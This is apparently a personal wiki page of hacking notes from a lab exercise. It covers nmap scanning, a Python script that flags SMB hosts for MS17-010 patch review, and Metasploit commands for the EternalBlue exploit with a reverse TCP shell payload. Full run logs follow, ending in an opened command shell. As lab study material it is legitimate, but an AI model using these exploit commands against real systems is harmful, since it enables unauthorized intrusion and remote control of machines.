====== Scan & Exploit ======
[[procedures:start|Hacking: procedures]]
===== nmap =====
A decent but slow scan:
<code>
nmap -sV -A -T4 -p- -oN vuln.nmap
</code>
  * The -sV flag looks for the versions of the services running on the ports.
  * -A enables OS detection (plus version detection, script scanning and traceroute).
  * -T4 is one of the timing options. There are 6 timing options: paranoid (0), sneaky (1), polite (2), normal (3), aggressive (4) and insane (5). The first two are for IDS evasion. Polite mode uses less bandwidth and fewer target machine resources. Normal mode (3) is the default. Aggressive mode speeds the scan up and insane is fast, but isn't always accurate. Basically, the slower ones are more accurate and less noisy and are better for IDS evasion. -T4 is an aggressive, quicker scan. I used this because this scan takes forever on my machine. I'm not sure it helped much because it still took forever!
  * -p- scans all 65535 TCP ports instead of the default top 1000.
  * -oN saves the results in nmap's normal output format to the file I named vuln.nmap.
Vulnerability search with the NSE vuln scripts:
<code>
nmap --script vuln -vv
</code>
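The vuln.nmap file written by -oN is plain text, so the open ports and version banners can be pulled out for patch-status review. The following is an added example, not part of the original page: it parses a constructed -oN sample (the port table layout is the real one, the host data is made up) and flags an exposed SMB port whose banner matches the Windows 7 SP1 build seen in the metasploit output below, so that MS17-010 patch status can be verified.

```python
import re
from dataclasses import dataclass

# Constructed sample of nmap -oN ("normal") output for a lab host. Not real scan data.
SAMPLE_NMAP = """\
# Nmap 7.91 scan initiated Thu May 20 17:40:02 2021 as: nmap -sV -A -T4 -p- -oN vuln.nmap 10.10.171.162
Nmap scan report for 10.10.171.162
Host is up (0.041s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE      VERSION
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  tcpwrapped
Service Info: Host: LABHOST; OS: Windows; CPE: cpe:/o:microsoft:windows
# Nmap done at Thu May 20 18:05:11 2021 -- 1 IP address (1 host up) scanned in 1509.38 seconds
"""

# One row of the PORT/STATE/SERVICE/VERSION table; VERSION is optional (-sV may not identify it).
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")

@dataclass
class Port:
    number: int
    proto: str
    state: str
    service: str
    version: str  # empty string when nmap printed no banner

def parse_nmap_normal(text: str) -> list[Port]:
    """Extract the port table rows from -oN output; header, comment and summary lines are skipped."""
    ports = []
    for line in text.splitlines():
        m = PORT_RE.match(line)
        if m:
            ports.append(Port(int(m.group(1)), m.group(2), m.group(3),
                              m.group(4), (m.group(5) or "").strip()))
    return ports

# Banner fragments that put a host in scope for an MS17-010 patch review (assumed list, not exhaustive).
LEGACY_SMB_BANNERS = ("Windows 7", "Windows Vista", "Windows Server 2008", "Windows XP", "Windows Server 2003")

def smb_patch_review(ports: list[Port]) -> list[str]:
    """Return one finding per exposed SMB port whose banner matches a legacy Windows build."""
    findings = []
    for p in ports:
        if p.proto == "tcp" and p.number == 445 and p.state == "open":
            if any(tag in p.version for tag in LEGACY_SMB_BANNERS):
                findings.append(f"445/tcp open, banner '{p.version}': verify MS17-010 is patched and SMBv1 is disabled")
    return findings

if __name__ == "__main__":
    found = parse_nmap_normal(SAMPLE_NMAP)
    for p in found:
        print(f"{p.number}/{p.proto} {p.state} {p.service} {p.version}")
    for f in smb_patch_review(found):
        print("FINDING:", f)
```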
===== metasploit =====
EternalBlue, Windows SMB:\\
''%%windows/smb/ms17_010_eternalblue%%''
<code>
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 10.10.42.65
set LHOST 10.8.192.236
set payload windows/x64/shell/reverse_tcp
run
</code>
It is important to set LHOST when we have several IP addresses (in the failed run below the handler bound to 10.0.2.15, the NAT address, instead of the VPN address 10.8.192.236, so the target could never connect back).\\
Otherwise the exploit will most likely fail.
Another payload to try:\\
''%%windows/x64/meterpreter/bind_tcp%%''
FAIL:
<code>
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.0.2.15:4444
[*] 10.10.171.162:445 - Executing automatic check (disable AutoCheck to override)
[*] 10.10.171.162:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.171.162:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.171.162:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.171.162:445 - The target is vulnerable.
[*] 10.10.171.162:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.171.162:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.171.162:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.171.162:445 - Connecting to target for exploitation.
[+] 10.10.171.162:445 - Connection established for exploitation.
[+] 10.10.171.162:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.171.162:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.171.162:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.171.162:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.171.162:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.171.162:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.171.162:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.171.162:445 - Sending all but last fragment of exploit packet
[*] 10.10.171.162:445 - Starting non-paged pool grooming
[+] 10.10.171.162:445 - Sending SMBv2 buffers
[+] 10.10.171.162:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.171.162:445 - Sending final SMBv2 buffers.
[*] 10.10.171.162:445 - Sending last fragment of exploit packet!
[*] 10.10.171.162:445 - Receiving response from exploit packet
[+] 10.10.171.162:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.171.162:445 - Sending egg to corrupted connection.
[*] 10.10.171.162:445 - Triggering free of corrupted buffer.
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.171.162:445 - Connecting to target for exploitation.
[+] 10.10.171.162:445 - Connection established for exploitation.
[+] 10.10.171.162:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.171.162:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.171.162:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.171.162:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.171.162:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.171.162:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.171.162:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.171.162:445 - Sending all but last fragment of exploit packet
[*] 10.10.171.162:445 - Starting non-paged pool grooming
[+] 10.10.171.162:445 - Sending SMBv2 buffers
[+] 10.10.171.162:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.171.162:445 - Sending final SMBv2 buffers.
[*] 10.10.171.162:445 - Sending last fragment of exploit packet!
[*] 10.10.171.162:445 - Receiving response from exploit packet
[+] 10.10.171.162:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.171.162:445 - Sending egg to corrupted connection.
[*] 10.10.171.162:445 - Triggering free of corrupted buffer.
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.171.162:445 - Connecting to target for exploitation.
[+] 10.10.171.162:445 - Connection established for exploitation.
[+] 10.10.171.162:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.171.162:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.171.162:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.171.162:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.171.162:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.171.162:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.171.162:445 - Trying exploit with 22 Groom Allocations.
[*] 10.10.171.162:445 - Sending all but last fragment of exploit packet
[*] 10.10.171.162:445 - Starting non-paged pool grooming
[+] 10.10.171.162:445 - Sending SMBv2 buffers
[+] 10.10.171.162:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.171.162:445 - Sending final SMBv2 buffers.
[*] 10.10.171.162:445 - Sending last fragment of exploit packet!
[*] 10.10.171.162:445 - Receiving response from exploit packet
[+] 10.10.171.162:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.171.162:445 - Sending egg to corrupted connection.
[*] 10.10.171.162:445 - Triggering free of corrupted buffer.
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Exploit completed, but no session was created.
msf6 exploit(windows/smb/ms17_010_eternalblue) >
</code>
OK:
<code>
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.8.192.236:4444
[*] 10.10.171.162:445 - Executing automatic check (disable AutoCheck to override)
[*] 10.10.171.162:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.171.162:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.171.162:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.171.162:445 - The target is vulnerable.
[*] 10.10.171.162:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.171.162:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.171.162:445 - Scanned 1 of 1 hosts (100% complete)
[*] 10.10.171.162:445 - Connecting to target for exploitation.
[+] 10.10.171.162:445 - Connection established for exploitation.
[+] 10.10.171.162:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.171.162:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.171.162:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.171.162:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.171.162:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.171.162:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.171.162:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.171.162:445 - Sending all but last fragment of exploit packet
[*] 10.10.171.162:445 - Starting non-paged pool grooming
[+] 10.10.171.162:445 - Sending SMBv2 buffers
[+] 10.10.171.162:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.171.162:445 - Sending final SMBv2 buffers.
[*] 10.10.171.162:445 - Sending last fragment of exploit packet!
[*] 10.10.171.162:445 - Receiving response from exploit packet
[+] 10.10.171.162:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.171.162:445 - Sending egg to corrupted connection.
[*] 10.10.171.162:445 - Triggering free of corrupted buffer.
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[-] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] 10.10.171.162:445 - Connecting to target for exploitation.
[+] 10.10.171.162:445 - Connection established for exploitation.
[+] 10.10.171.162:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.171.162:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.171.162:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.171.162:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.171.162:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.171.162:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.171.162:445 - Trying exploit with 17 Groom Allocations.
[*] 10.10.171.162:445 - Sending all but last fragment of exploit packet
[*] 10.10.171.162:445 - Starting non-paged pool grooming
[+] 10.10.171.162:445 - Sending SMBv2 buffers
[+] 10.10.171.162:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.171.162:445 - Sending final SMBv2 buffers.
[*] 10.10.171.162:445 - Sending last fragment of exploit packet!
[*] 10.10.171.162:445 - Receiving response from exploit packet
[+] 10.10.171.162:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.171.162:445 - Sending egg to corrupted connection.
[*] 10.10.171.162:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.171.162
[*] Command shell session 1 opened (10.8.192.236:4444 -> 10.10.171.162:49235) at 2021-05-20 18:01:46 +0200
[+] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.171.162:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
</code>
Articles:\\
[[https://null-byte.wonderhowto.com/how-to/exploit-eternalblue-windows-server-with-metasploit-0195413/]]\\
[[https://ratiros01.medium.com/tryhackme-blue-dc8b97351248]]\\
[[https://www.jil-wright.com/blog/tryhackme-eternal-blue-ms17-010]]